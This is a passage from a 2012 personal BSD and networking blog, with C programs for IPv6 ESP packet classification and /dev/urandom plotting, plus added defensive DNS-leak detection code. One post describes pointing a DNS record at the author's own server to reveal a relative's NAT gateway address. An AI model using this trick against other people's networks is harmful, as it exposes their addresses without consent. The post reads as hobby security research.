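        0x61, 0x00, 0x00, 0x00, 0x00, 0x14, 0x06, 0x40,
        0x20, 0x01, 0x0a, 0x60, 0xf0, 0x74, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30,
        0x20, 0x01, 0x0a, 0x60, 0xf0, 0x74, 0x00, 0x05,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
        0xc0, 0x00, 0x00, 0x50, 0x00, 0x00, 0x00, 0x01
};

/* Read a 32-bit big-endian (network order) value. */
static uint32_t be32(const uint8_t *p)
{
        return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
            ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Decode the fixed IPv6 header and, if it carries ESP, the ESP header. */
enum verdict classify(const uint8_t *pkt, size_t len, struct esp_info *out)
{
        size_t i;

        if (len < IPV6_HDR_LEN || (pkt[0] >> 4) != 6)
                return V_MALFORMED;
        if (pkt[6] != NH_ESP)
                return V_NOT_ESP;
        if (len < IPV6_HDR_LEN + ESP_HDR_LEN)
                return V_MALFORMED;

        out->traffic_class = (uint8_t)(((pkt[0] & 0x0f) << 4) | (pkt[1] >> 4));
        out->payload_len = (uint16_t)((pkt[4] << 8) | pkt[5]);
        out->hop_limit = pkt[7];
        out->spi = be32(pkt + IPV6_HDR_LEN);
        out->seq = be32(pkt + IPV6_HDR_LEN + 4);

        for (i = 0; i < sizeof(sad_spis) / sizeof(sad_spis[0]); i++)
                if (sad_spis[i] == out->spi)
                        return V_ESP_KNOWN_SA;
        return V_ESP_UNKNOWN_SA;
}

static void report(const char *label, const uint8_t *pkt, size_t len)
{
        static const char *names[] = {
                "ESP, SPI found in SAD", "ESP, SPI not in SAD",
                "not ESP (cleartext)", "malformed"
        };
        struct esp_info info = { 0, 0, 0, 0, 0 };
        enum verdict v = classify(pkt, len, &info);

        printf("%-16s %s", label, names[v]);
        if (v == V_ESP_KNOWN_SA || v == V_ESP_UNKNOWN_SA)
                printf(" spi 0x%08x seq %u len %u", (unsigned)info.spi,
                    (unsigned)info.seq, (unsigned)info.payload_len);
        printf("\n");
}

int main(void)
{
        report("mars -> dione", pkt_mars_to_dione, sizeof(pkt_mars_to_dione));
        report("dione -> mars", pkt_dione_to_mars, sizeof(pkt_dione_to_mars));
        report("constructed", pkt_cleartext, sizeof(pkt_cleartext));
        return 0;
}
```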



2.97 euros for Jamaica (iTunes)

January 14th, 2012

Today I bought 5 songs off iTunes. 3 songs hail from Jamaica with the artists Chuck Fender, Movado and Fantan Mojah who I have heard on Youtube long enough to warrant putting some money in their pocketses. The other two songs are from Stratford, Ontario artist Nukky Grissom who was featured on SVPRadio last week. Good stuff. I lived in Stratford for 7 years so I know what he talks about in his songs (especially Small Town which was one that I bought). I can relate. I'm overall happy with the purchase.



FreeBSD 9.0 Released and PC-BSD 9.0 Released

January 15th, 2012

The wait is finally over! FreeBSD released its version 9.0 a few days ago and dedicated it to Dennis Ritchie. Here is the 9.0 Release announcement.

Also PC-BSD (which is forked from FreeBSD) released its 9.0 version. Here is the release page from its blog.



Removed web mirror on uranus.centroid.eu

January 18th, 2012

You may not have known it but uranus.centroid.eu was serving this blog for well over a year. I have now killed the rsync job and erased the mirror. Uranus will do other tasks in the future, stuff I don't want to go into just yet. Here is an mrtg yearly graph that I was hosting on uranus that doesn't run anymore.

As you can see uranus did quite a bit of traffic every month. (about 15GB per month on average). If you used to go to uranus.centroid.eu to get whatever you can still get it on ipv4.goldflipper.net for the time being.



My dream Smartphone (Computer)

January 27th, 2012

My dream smartphone would be small like an iphone. It would have USB ports for keyboard and mouse and perhaps a VGA port for external monitor. It would be running OpenBSD without locking or restrictions. What's really important to me is that I can program the OS on this phone. The phone functions can be proprietary without source code but they must be installed in a way that it allows the rest of the system to function with it. Perhaps an asterisk server built-in so that it can do programmable voice mail or something. There wouldn't be a harddrive in the phone but rather an SSD. What's really important to me is that I can develop applications on the phone for the phone, and not have to buy a proprietary laptop to use some application which is the only one that can do so. It may have a GPS and/or Galileo/Glonass/whatever geopositioning chip in it. But this should be readable by an open driver on OpenBSD and through an ioctl into userland or something. I want to make use of the Geolocation too. It should have Wifi and bluetooth and if I want to allow tethering I should be able to program it in. I should be able to compile the kernel on this smartphone and run that instead. Really. I really want this to be MY phone not THEIR phone that I am allowed to use. Currently I have no cell phone at all because what I just described doesn't exist. Hmm how much would I pay for what I just described? Perhaps 400 euros at max.



Wildcarddnsd fixed on big-endian machines?

January 28th, 2012

Ever since I resurrected my G4 Cube and put OpenBSD on it I was dying to know if wildcarddnsd works on this platform. I copied uranus's configs to it (it's called mars) and ran a few queries. It was then a surprise a few weeks later that I tried an AXFR and it came back as a hexdump in dig. Not good. With gdb then I finally found out what caused the mangled packet, the nameserver and responsible person fields were of length zero, and were skipped in the SOA answer. I traced this to an integer overflow right at program start at the config file parser. Well I fixed this now in HEAD yesterday and in the upcoming release for BETA7 it will be working on big endian machines.

I also tried compiling wildcarddnsd on OpenBSD/amd64 5.1-beta and got a compiler warning. A nice developer helped me out and a second pointed to another possible problem. So I have the fix for silencing this compiler warning but I haven't committed it yet. I want to play with this a little first before I do so I know that it doesn't cause any problems.



Change is in the air

February 2nd, 2012

I've done some changes and I'm planning to do more changes. What I've done is I increased my BOINC load from 1 core (25%) to 2 cores (50%). It will run like this until May.

Why? What's in May?

Well, that is when OpenBSD 5.1 comes out and I've decided I'm going to make OpenBSD 5.1 my host operating system. No more vmware, it won't run on it. Also it may mean no more BOINC so that's why I'm doubling the load now to leave them with something. Also means no more windows 7 vm, and the other vm's that run FreeBSD and NetBSD I'll have to switch over to QEMU. What I'll do is get a new backup harddrive and start converting vmware containers to a format that I can play it back on QEMU. Much of what prompted me to design this thought is that youtube now works with an OpenBSD browser. This makes OpenBSD ready for the desktop for me. And it's not the first time I ran OpenBSD as a desktop, it's just that I had a breather.



Information and its exchange

February 13th, 2012

What is information? It's data. It's written symbols or spoken words that are encoded/recorded somehow. In the 80's when I was a child we had several means of getting information. We could buy books. We could buy a vinyl record or a cassette tape. Information intended for the masses was spread by radio and television. Usually the radio stations were government run or were independent private radio stations that were approved by government who listened like owls for any "message" that did not fit a strict guideline. If someone disregarded these guidelines (like saying F.U.C.K. on-air) they would get penalized or even turned off completely.

So what if you wanted a more relaxed medium to listen to? Well what we did in the early 90's was share cassette tapes with spoken word over music (hip-hop). The drawback was that you had to make a master copy and copy from it because every time you copied the analog signal on the tape would get ever so distorted. Also with more usage the tape would get worn. It was fairly frustrating. When I then attended College for computing engineering technology I was told that digital is a cheap way of exchanging information. The digital circuitry didn't care if the voltage was 0.5 volts off what it really was, which meant you could now share the SAME data over a medium that would have been impossible if it was over analog. Digital communication meant that every time you did a copy of a copy of a copy the data would not degrade in quality.

So then eventually the Internet became popular and spread. First it was slow and the information exchange was probably in 8 bit ascii (e-mail, usenet) which was fine for a 28.8 Kbps analog modem. Then came the DSL revolution. ISP's who established themselves from BBS's were bought out or were forced out of business as the Telco companies once again dominated in the Information exchange. But how that went down is irrelevant, what is more important is that Information exchanged could now be sounds as in music and it could be spread en-masse. Formats such as podcasts came. Podcasts are large MP3 files that are stored on a server and can be downloaded via a server or a bittorrent network for people to listen to a message.

So now we have a problem. Someone's information is copyrighted, this means that they wish to make money off the message. In the 80's this was easy they'd get a distributor who printed records and people bought this in the store and took it home. They did not worry about piracy because if people wanted to spread the information the message would be distorted after so many copies. Today in the 2010's the message can be mass-spread with no quality degradation. The powers that used to make a good buck off the 80's method are now out of business or on the verge of. At the same time we've never had a better way of spreading information on a personal level than now. I can send a song to all my friends at fair quality. We've been liberated by the Internet. And as a closing statement any attempt to take quality sound reproduction from us is sheer censorship. The thought has already been planted that we can do this, we're not talking about what if's anymore.

We're not out to do harm, and we know that this is just a step between now and then. What's next is anyone's guess but the Internet keeps changing us. We learn, and the Internet is the teacher. We are transitioning. We are as curious what's next as the next one. Some people fear change because it uproots their previous power structure. But let me ask you in all honesty is it not fair to give everyone the same outlet as an elite bunch once had? This is what (r)evolution is about and we are still evolving. One more observance is that we're becoming more seclusive in our own homes due to the Internet. This takes away some of our unity, that's the drawback. We don't need laws like ACTA to draw us further back.



Sticker time!

February 13th, 2012

I opened my OpenBSD 5.0 CD set today. I was going to give it away/trade it away but no one was interested. 90 days on offer went past and so I opened it today. I put the stickers on mars and saturn.

I think it looks stunningly good. Mars has a lot of goo over it from previous OpenBSD 3.0 stickers that were on its casing that were removed for a bit, but the goo didn't disappear. Just goes to show you going with OpenBSD is a one way street :-).



Jupiter and Venus really bright

February 19th, 2012

Today I saw Jupiter and Venus really bright in the South-West-Western sky. I couldn't take a photo but I got a clip of xephem for the memories. Jupiter is in Aries and Venus is in Pisces, and Uranus in Pisces too but it can't be seen with the naked eye.



100+ Euros donations to some *BSD's

February 26th, 2012

The Marrakesh Express came through. Just Kidding! I donated 50 euros to the OpenBSD project and 57 Euros (75 dollars) to the FreeBSD Project. I use both Operating Systems at home and at work and am very satisfied with both projects and their individual directions. I'm still looking to purchase OpenBSD 5.1 when it's up for preorders, so this is a big spend!



article test

February 27th, 2012

When searching some articles appeared duplicate, with one not having content. This should fix that.



Free the General

February 29th, 2012

If you follow Reggae Music you may have heard that Buju Banton was jailed. For a long time I have carried these words with me and I don't know if I shared them yet, but the resistor codes in electronics stand for:

Buju Banton, Rasta Of Young Generation, Became Victorious, Glorious & Wise
Following this is the Electronic Resistor Codes as taught by Canadian Colleges. I know Buju Banton is a resistor! Hang in there sir! Free Buju Banton!



Looking for work

March 2nd, 2012

I got notice today that I won't get a contract extension come April 30th, of this year. So I'm looking for work again starting May 1st, 2012. I'm willing to do remote sysadmin work for *NIX systems and/or programming on *NIX systems. Why remote? Because I'm unwilling to move away from my family and they never heard of *NIX around here (it seems). Please have a look at my resume. If you know of companies hiring remote employees it would be nice if you let me know.

Due to health issues I'm only able to work 20 to 30 hours weekly max.



OpenBSD pre-orders are up!

March 14th, 2012

I just pre-ordered my 5.1 CD set from OpenBSD Europe. Here is the OpenBSD 5.1 Release page, it's a work in progress. The artwork and lyrics for the song are out but I haven't heard the song yet, I can't download it for some reason. Oh well in due time. This time the theme of OpenBSD seems to be Ghostbusters. Only they are Bugbusters. If memory of cartoons serves me right Ghostbusters had a pet ghost called slimey or slimer...guess the OpenBSD team have a pet bug called ... I dunno.



Equinox in 5 days

March 15th, 2012

Equinox is a terrestrial event. It is on this day that the earth's equator is exactly aligned with the sun in a perpendicular fashion. Read more about equinox in the previously mentioned link.



Bought Saturn (ACER Aspire One)

March 16th, 2012

It's my birthday. I bought an Acer Aspire One 722 for my family and me. It has 4 GB of RAM and an AMD processor (C-60 1 GHz, 1 MB L2 Cache). I named it saturn. It'll be running windows 7 for a while until next year perhaps when I give it a facelift. Guess what OS I have in mind for it? :-).



Checking Randomness on Debian

March 23rd, 2012

I noticed that /dev/*random on Debian and Ubuntu were mode 666. I found a bug report about this too in the Debian archives. But I wasn't convinced; to prove a point you have to do some work. So I remembered this article on XOR encryption and I thought it could help me with my randomness plotting as well. If there is a pattern I'll see it. Basically randomness should be evenly spread out in an X,Y,Z plot.

So I wrote the program to get the random data from Debian but I first write a string to its /dev/urandom before waiting 10 seconds and reading 512 bytes, here is the program for this:

#include <sys/types.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <unistd.h>
#include <fcntl.h>

int
main(void)
{

        char buf[512];
        char *string = "OrpheanBeholdersCryDoubt!";
        int len;
        int fd, output;

        fd = open("/dev/urandom", O_RDWR, 0);

        if (fd < 0) {
                perror("open");
                exit(1);
        }

        len = write(fd, string, strlen(string));
        if (len < 0) {
                perror("write");
                exit(1);
        }

        sleep(10);


        output = open("cryptfile", O_APPEND | O_CREAT | O_WRONLY, 0644);
        if (output < 0) {
                perror("open");
                exit(1);
        }

        len = read(fd, buf, sizeof(buf));
        if (len <= 0) {
                perror("read");
                exit(1);
        }

        if (write(output, buf, len) < 0) {
                perror("write 2");
                exit(1);
        }

        close(fd);
        close(output);

        exit(0);
}
On OpenBSD then I did the same program with the write to the device disabled since its permissions are mode 644. The data I gathered I then put through another program that looks like this:
#include <sys/types.h>

#include <stdio.h>
#include <stdlib.h>

#include <unistd.h>
#include <fcntl.h>

int
main(int argc, char *argv[])
{
        u_int16_t array[6];     /* six 16-bit samples per round */
        char *file;
        int fd;
        ssize_t len;

        if (argc != 2) {
                fprintf(stderr, "usage: %s file\n", argv[0]);
                exit(1);
        }

        file = argv[1];
        fd = open(file, O_RDONLY, 0);
        if (fd < 0)  {
                perror("open");
                exit(1);
        }

        /* stop at a short read so stale samples are never plotted */
        while ((len = read(fd, array, sizeof(array))) ==
            (ssize_t)sizeof(array)) {
                /* three overlapping points of consecutive differences */
                printf("%d, %d, %d\n%d, %d, %d\n%d, %d, %d\n",
                        array[0] - array[1],
                        array[1] - array[2],
                        array[2] - array[3],
                        array[1] - array[2],
                        array[2] - array[3],
                        array[3] - array[4],
                        array[2] - array[3],
                        array[3] - array[4],
                        array[4] - array[5]);
        }
        if (len < 0) {
                perror("read");
                exit(1);
        }

        close(fd);

        exit(0);
}
The instructions on the math involved I got from the article I mentioned above.

I then ran it through gnuplot with the data by calling splot, like so:

gnuplot> splot 'cplot.dat'
And here are the graphs this produced:
OpenBSD (above)
Debian with write to /dev/urandom (above)

All in all this was a very educational event for me, I hope you like the article too!
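
The plot can also be turned into a number: divide the cube of difference triples into cells and count how many cells ever receive a point. This C program is an added example, not the program from the post; it slides over every sample instead of six at a time, and both inputs (a xorshift32 generator and an 8-bit LCG with period 256) are constructed stand-ins for data read from a device.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BINS   32                       /* cells per axis */
#define NCELLS (BINS * BINS * BINS)
#define NVALS  60000                    /* 16-bit samples per source */

static uint16_t samples[NVALS];

/* Map a difference in [-65535, 65535] to a bin index 0..BINS-1. */
static int bin_of(int d)
{
        return (d + 65536) / (131072 / BINS);
}

/*
 * Build the same points the post plots, (v[i]-v[i+1], v[i+1]-v[i+2],
 * v[i+2]-v[i+3]), and count how many grid cells contain at least one.
 */
size_t occupied_cells(const uint16_t *v, size_t n)
{
        static unsigned char seen[NCELLS];
        size_t i, count = 0;

        memset(seen, 0, sizeof(seen));
        for (i = 0; i + 3 < n; i++) {
                int x = bin_of((int)v[i] - (int)v[i + 1]);
                int y = bin_of((int)v[i + 1] - (int)v[i + 2]);
                int z = bin_of((int)v[i + 2] - (int)v[i + 3]);
                size_t cell = ((size_t)x * BINS + (size_t)y) * BINS + (size_t)z;

                if (!seen[cell]) {
                        seen[cell] = 1;
                        count++;
                }
        }
        return count;
}

/* Constructed well-mixed source: xorshift32, upper 16 bits of each step. */
void fill_xorshift(uint16_t *v, size_t n, uint32_t seed)
{
        uint32_t s = seed ? seed : 1;
        size_t i;

        for (i = 0; i < n; i++) {
                s ^= s << 13;
                s ^= s >> 17;
                s ^= s << 5;
                v[i] = (uint16_t)(s >> 16);
        }
}

/* Constructed weak source: 8-bit LCG (period 256) stretched to 16 bits. */
void fill_lcg8(uint16_t *v, size_t n, uint8_t seed)
{
        uint8_t s = seed;
        size_t i;

        for (i = 0; i < n; i++) {
                s = (uint8_t)(s * 5 + 1);
                v[i] = (uint16_t)(s * 257);
        }
}

size_t cells_for_xorshift(void)
{
        fill_xorshift(samples, NVALS, 2012);
        return occupied_cells(samples, NVALS);
}

size_t cells_for_lcg8(void)
{
        fill_lcg8(samples, NVALS, 42);
        return occupied_cells(samples, NVALS);
}

int main(void)
{
        printf("xorshift32: %zu of %d cells occupied\n",
            cells_for_xorshift(), NCELLS);
        printf("8-bit LCG:  %zu of %d cells occupied\n",
            cells_for_lcg8(), NCELLS);
        return 0;
}
```

Consecutive differences can never fill the whole cube, so the count is only useful for comparing sources sampled the same way, and a high count rules out gross defects only.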



Remember the Venus Glider?

March 24th, 2012

A long time ago, the centroid.eu blog featured my idea of a Venus glider. It's not even in the archives anymore but I wanted to touch on the idea again. Basically the planet Venus rotates very slowly around its axis. This makes a glider possible that can loiter around the terminator (line between night and day) of Venus. It could have payloads such as radar and UV and IR spectrometers. It would likely be somewhat high in the atmosphere due to the atmospheric pressure and more updraft higher in the atmosphere. It may even have a backup propeller that is foldable into its fuselage, for when mistakes are made in catching sufficient thermals. Solar panels that are embedded in the wing area can then recharge the batteries when the glider is high above the clouds and on the day side. One good thing about a glider that is falling on Venus is that the atmosphere becomes so dense that its rate of descent will slow as it gets lower towards the surface. This Venus glider would not be carrying astronauts but rather be entirely electronically and computer driven.



Who watches the watchers?

March 28th, 2012

I did a whois of my brother's domain:

dione$ whois skpegasus.ca|more
Domain name:           skpegasus.ca
Domain status:         registered
Creation date:         2011/10/23
Expiry date:           2013/10/23
Updated date:          2011/10/25

Registrar:
    Name:              DomainsAtCost Corp.
    Number:            45

Name servers:
    uranus.centroid.eu
    cirabug.goldflipper.net

% WHOIS look-up made at 2012-03-28 10:06:26 (GMT)
%
% Use of CIRA's WHOIS service is governed by the Terms of Use in its Legal
% Notice, available at http://www.cira.ca/legal-notice/?lang=en
%
% (c) 2010 Canadian Internet Registration Authority, (http://www.cira.ca/)
I was shocked to see a lookup stemming from a CIRA contractor of this domain in my DNS logs. Apparently I must have tripped a wire with the innocent WHOIS lookup. Here is the log. Notice the lookup from viagenie came 2 hours after my initial WHOIS, so they do follow up on domains that are logged.
Mar 28 14:42:05 uranus wildcarddnsd[23167]: request on descriptor 21 interface 
"em0" from 206.123.31.9 (ttl=49, region=255) for "www.skpegasus.ca." type=A(1) 
class=1, answering "www.skpegasus.ca."
I'm thinking of expiring the .ca domain as my brother is too internet illiterate to make use of it. It's basically just sitting there taking in mails from spammers.



Interesting findings about older Airport Express Access Points

March 30th, 2012

My parents use an Apple Express AP for a print-server on their NAT'ed network at Deutsche Telekom. I configured this access point to have the domain name as "centroid.eu" and I noticed in my DNS logs that occasionally the access point would "search" for the time server called "time.euro.apple.com.centroid.eu" , here is a log:

Jan  8 15:00:49 uranus wildcarddnsd[14573]: request on descriptor 85 interface 
"gif0" from 2003:180:2:7000:53:1:6:1 (ttl=0, region=255) for 
"time.euro.apple.com.centroid.eu." type=AAAA(28) class=1, answering "NXDOMAIN"
So today I wanted to play. I wanted to find out if I can reveal the IPv4-only network of my parents. So I mapped the AAAA RR of time.euro.apple.com.centroid.eu to ::ffff:1.2.3.4 where 1.2.3.4 is really the address of uranus.centroid.eu my home server. Here is what it looks like:
;; QUESTION SECTION:
;time.euro.apple.com.centroid.eu. IN    AAAA

;; ANSWER SECTION:
time.euro.apple.com.centroid.eu. 86400 IN AAAA  ::ffff:212.114.251.91
My hope was that the AP would try to connect to the NTP port of uranus and thus be logged by my firewall. And guess what?
tcpdump: WARNING: snaplen raised from 116 to 160                                
13:10:49.833022 84.170.XXX.XXX.1052 > 212.114.251.91.123: v1 client strat 0 poll
+0 prec 0 dist 0.000000 disp 0.000000 ref (unspec)@0.000000000 orig 0.000000000 
+[|ntp] (ttl 56, id 118, len 76) 
And it reveals the IP of the NAT gateway of my parents. (I XXX'ed stuff out to protect the innocent). Now I wonder what I can do with this or how this can be maliciously used. Obviously putting the domain name cia.gov into an apple access point is NOT a good idea if you want your privacy, not even as a joke, because I've proven now that they'll find out who you are.
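
Both halves of this experiment can be spotted from the defending side: a query name that carries a whole foreign FQDN in front of the local zone, and an AAAA answer whose address is really an IPv4 address inside ::ffff:0:0/96. The following C functions are an added example, not code from wildcarddnsd; the function names and the short TLD list are assumptions for illustration.

```c
#include <arpa/inet.h>
#include <ctype.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive string equality (DNS names are case-insensitive). */
static int eq_nocase(const char *a, const char *b)
{
        while (*a && *b) {
                if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
                        return 0;
                a++;
                b++;
        }
        return *a == *b;
}

/*
 * Query-log check: returns 1 if qname lies inside zone and the part in
 * front of the zone itself ends in a TLD, which is what a client produces
 * when it appends its search domain to an already complete name.
 */
int search_suffix_leak(const char *qname, const char *zone)
{
        /* sample list only (assumption); a real check would use a full one */
        static const char *tlds[] = { "com", "net", "org", "gov", "edu" };
        char buf[256];
        const char *last;
        size_t qlen = strlen(qname), zlen = strlen(zone), i;

        if (qlen > 0 && qname[qlen - 1] == '.')
                qlen--;                         /* drop the root dot */
        if (qlen >= sizeof(buf) || qlen <= zlen + 1)
                return 0;
        memcpy(buf, qname, qlen);
        buf[qlen] = '\0';
        if (buf[qlen - zlen - 1] != '.' || !eq_nocase(buf + qlen - zlen, zone))
                return 0;                       /* not inside our zone */
        buf[qlen - zlen - 1] = '\0';            /* keep what is left of the zone */
        last = strrchr(buf, '.');
        if (last == NULL)
                return 0;                       /* single label such as "www" */
        for (i = 0; i < sizeof(tlds) / sizeof(tlds[0]); i++)
                if (eq_nocase(last + 1, tlds[i]))
                        return 1;
        return 0;
}

/*
 * Answer check for a dig-style line "name ttl IN AAAA address".
 * Returns 1 and writes the embedded IPv4 address to v4out if the address
 * is IPv4-mapped, 0 for an ordinary AAAA, -1 if the line is not an AAAA RR.
 */
int mapped_aaaa(const char *line, char *v4out, size_t outlen)
{
        char name[256], cls[8], type[8], addr[64];
        unsigned long ttl;
        struct in6_addr a6;
        struct in_addr a4;

        if (sscanf(line, "%255s %lu %7s %7s %63s",
            name, &ttl, cls, type, addr) != 5)
                return -1;
        if (strcmp(cls, "IN") != 0 || strcmp(type, "AAAA") != 0)
                return -1;
        if (inet_pton(AF_INET6, addr, &a6) != 1)
                return -1;
        if (!IN6_IS_ADDR_V4MAPPED(&a6))
                return 0;
        memcpy(&a4, &a6.s6_addr[12], sizeof(a4));   /* last 4 bytes = IPv4 */
        if (inet_ntop(AF_INET, &a4, v4out, (socklen_t)outlen) == NULL)
                return -1;
        return 1;
}

int main(void)
{
        /* query name and answer line as they appear in the post */
        const char *q = "time.euro.apple.com.centroid.eu.";
        const char *rr = "time.euro.apple.com.centroid.eu. 86400 IN AAAA  "
            "::ffff:212.114.251.91";
        char v4[INET_ADDRSTRLEN];

        printf("search-suffix leak: %d\n", search_suffix_leak(q, "centroid.eu"));
        if (mapped_aaaa(rr, v4, sizeof(v4)) == 1)
                printf("IPv4-mapped AAAA, clients will connect to %s\n", v4);
        return 0;
}
```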



Exclusive view of my workbench

March 31st, 2012

I know it's a little dusty...here is my home workbench.
Below is the lanner that I bought last year January; other than a little dust it looks marvelous to me.
All ports used up so far.



SVPRadio - One Year Anniversary

April 4th, 2012

Today marks the one year anniversary of SVPRadio, Stratford, Ontario's underground radio station. It streams from 6PM to 12 Midnight every Wednesday to people who can receive online radio. I have been given some inside photos of the studio and people involved.
It was a little over a year ago that we came together and decided to stream a radio format. With the guidance of DJ Jaz and help from a whole bunch of DJ's they made an entertaining Wednesday every week for 52 shows so far.
I personally listened to every show that was streamed and was delighted every time. Every time there was something new on at least one or two shows.
Congratulations to SVPradio! And good luck on your second year!



Ordered three books

April 6th, 2012

I ordered 3 books from Amazon...

"The Art of Assembly Language"
Hyde, Randall; Paperback; EUR 36,95

"Reversing: Secrets of Reverse Engineering"
Eilam, Eldad; Paperback; EUR 30,40

"Hacking: The Art of Exploitation"
Erickson, Jon; Paperback; EUR 40,14
I'm hoping to reach an excitement factor in the future with these.



Added a robots.txt file

April 8th, 2012

I want to see how much my traffic drops with this, this is what I got..

%more robots.txt
User-agent: *
Disallow: /blog/
In the future people can still reach my /private and /public folders through google.



26 Years of Personal Computing History

April 18th, 2012

In a previous article I listed all the computers I had, by now 2.5 years later 3 more have been added. Uranus, Jupiter, and Saturn. I'm going to give a rough outline of them.

year  , computer type       , Mhz     ,acc. Mhz , RAM        ,accumulated RAM
------------------------------------------------------------------------------
1986  , Sinclair ZX-81      , 1    Mhz, 1    Mhz, 4        KB,  4         KB
1988  , Commodore C-64      , 2    Mhz, 3    Mhz, 64       KB,  68        KB
1992  , IBM-PC 386-SX25     , 25   Mhz, 28   Mhz, 4096     KB,  4164      KB
1994  , IBM-PC 486-66DX2    , 66   Mhz, 94   Mhz, 8192     KB,  12356     KB
1996  , Intel Pentium 120   , 120  Mhz, 214  Mhz, 32767    KB,  45123     KB
1999  , Intel P-II-350      , 350  Mhz, 564  Mhz, 131072   KB,  176195    KB
1999  , Intel P-II-350      , 350  Mhz, 914  Mhz, 131072   KB,  307267    KB
2000  , AMD Athlon 1000     , 992  Mhz, 1906 Mhz, 262144   KB,  569411    KB
2001  , Apple G3 iBook      , 500  Mhz, 2406 Mhz, 131072   KB,  700483    KB
2001  , Apple G4 Cube       , 450  Mhz, 2856 Mhz, 131072   KB,  831555    KB
2003  , Intel Pentium 200   , 200  Mhz, 3056 Mhz, 65535    KB,  897090    KB
2005  , AMD Athlon64 3500+  , 2200 Mhz, 5256 Mhz, 4194304  KB,  5091394   KB
2010  , Intel Core i7 4core , 9600 Mhz,14000 Mhz, 8192000  KB, 13000000   KB
2011  , Intel Atom N270     , 1600 Mhz,15600 Mhz, 1024000  KB, 14000000   KB
2012  , AMD C-60 "Ontario"  , 1000 Mhz,16600 Mhz, 4096000  KB, 18000000   KB
------------------------------------------------------------------------------
Hard to believe that 18 GB of RAM have been accumulated in all my computers. In 2005 it was just 5 GB. Yup I'm spoiled and I'm worried about overspending. One positive factor however is that the Atom and C-60 don't use up very much electricity so I can keep them on overnight, and since Saturn (the C-60) is running windows it goes into sleep mode after I close the lid of the netbook. I haven't checked but I would assume the energy draw is little then.



Jupiter needed an operation

April 19th, 2012

Today I looked how hot Jupiter was and with horror I noticed the CPU was at 81 degrees Celsius. A few more Centigrade and it would have turned itself off from overheating. So I decided to clean the heatsink from dust again. See here. To my horror and after reseating the heatsink 4 times it didn't have any cooling effect. So I had to go out and buy a new heatsink/cpu cooler. I bought a Cooltek Coolforce 2. I had to unmount the motherboard from its back-panel today to install the new CPU heatsink/fan. Before

After

To my surprise the CPU is now 25 degrees cooler and the CPU fan is not as fast and loud. Very cool!



New Job, my first week

April 28th, 2012

I have switched jobs and I want to tell about it so far. I think it's an awesome job because it's 100% remote. But like any office setup I have a voice over IP (VOIP) phone where I stay in contact with the staff and it's routed entirely over the Internet. The phone I had from before because I had contracted (technically I'm still a contractor) from this company in the past and back then we got the SIP Phone for me. The pay is sufficient for me to move out of my 1 bedroom apartment and I'm eyeing January or February of 2013 for the move. I'm hoping to get an apartment where I can dedicate 1 room to the office so that I can close the door at the end of the day. My hours are spread more over the day since work is also in North America and I'm in Europe. So I have the benefit of being able to conduct maintenance on the computer systems while everyone sleeps and I'm also available during the morning hours to the company. Our systems were designed for remote consoles since that was the idea of the system architect, and it suits me 100%. I'm glad I got this job since I'd likely be unemployed again if I didn't have it. Well, that's all so far, but I also want to say that I'm 100% impressed.



Got this new book

April 29th, 2012

Yesterday Amazon delivered this new book for me that I need for work..

Understanding the Session Initiation Protocol by Alan B. Johnston.
Partly good is that I can read this on company time.



BOINC processing coming to an end

April 29th, 2012

In this article I wrote about increasing boinc from 1 to 2 cores. It has been doing that since February 2nd. So all good things come to an end, they say and it is without regret that I'll be ceasing my processing probably around May 2nd. So I had done 3 months of processing on 2 cores. OpenBSD Europe has started shipping OpenBSD 5.1 and I fully expect my copy to get here tomorrow so that I can start installing Jupiter with OpenBSD. In this other article I wrote about being in spot 142,597 well I'm happy to report that I'm now in spot 97,043 so in the top 100,000. And also in the top 5% of BOINC participants. I think it's a job well done and I also paid for it with my electricity bill. At least I gave something back for science.



Wildcarddnsd, pondering hacking again

April 29th, 2012

Well I had a really long break from hacking on wildcarddnsd. While reading in this SIP book (see below) I noticed that the SRV RR is not supported by W. So I'm thinking of putting that in. Anyone interested in helping with this? Other little hacks are moving the command line flags to options in the config file. If anyone is interested in doing that go right ahead! If you want a bigger challenge I need a replacement parse.c file that is nicer perhaps a YACC file (no bison!). What's on the menu for the long run? Well I hope to be getting some time to do DNSSEC sometime in the next 2 years and also the recursive resolver function I'd like to re-implement as this one is currently broken. There is lots to do you just gotta look for it.



OpenBSD 5.1 released, jupiter.centroid.eu built

May 1st, 2012

OpenBSD 5.1 has been released today, at least I found the OS on the ftp.eu.openbsd.org ftp server. So I wiped my vmware setup and installed it on the 160 GB SSD. Here is a paste from the top while playing a youtube video:

load averages:  0.98,  0.91,  1.00                 jupiter.centroid.eu 14:14:43
56 processes:  53 idle, 1 zombie, 2 on processor
CPU0 states: 11.6% user,  0.0% nice,  4.8% system,  0.0% interrupt, 83.6% idle
CPU1 states:  0.0% user,  0.0% nice,  0.0% system,  0.0% interrupt,  100% idle
CPU2 states:  0.0% user,  0.0% nice,  0.0% system,  0.0% interrupt,  100% idle
CPU3 states:  0.0% user,  0.0% nice,  0.0% system,  0.0% interrupt,  100% idle
CPU4 states:  0.0% user,  0.0% nice,  0.0% system,  0.0% interrupt,  100% idle
CPU5 states:  4.0% user,  0.0% nice,  0.8% system,  0.0% interrupt, 95.2% idle
CPU6 states: 13.2% user,  0.0% nice,  8.8% system,  0.0% interrupt, 78.0% idle
CPU7 states: 11.6% user,  0.0% nice,  9.8% system,  0.0% interrupt, 78.6% idle
Memory: Real: 269M/958M act/tot Free: 6994M Cache: 575M Swap: 0K/7353M
mostly idle. This thing is a beast. Yes I did turn on HT again to see if the lockups were confined only to Linux. I had another 80 GB SSD which I have now put to rest until I need a replacement SSD. Also I tried gnome but it didn't work so I'm back to using fluxbox which is fine with me.



io.solarscale.de needed a rescue/fsck

May 11th, 2012

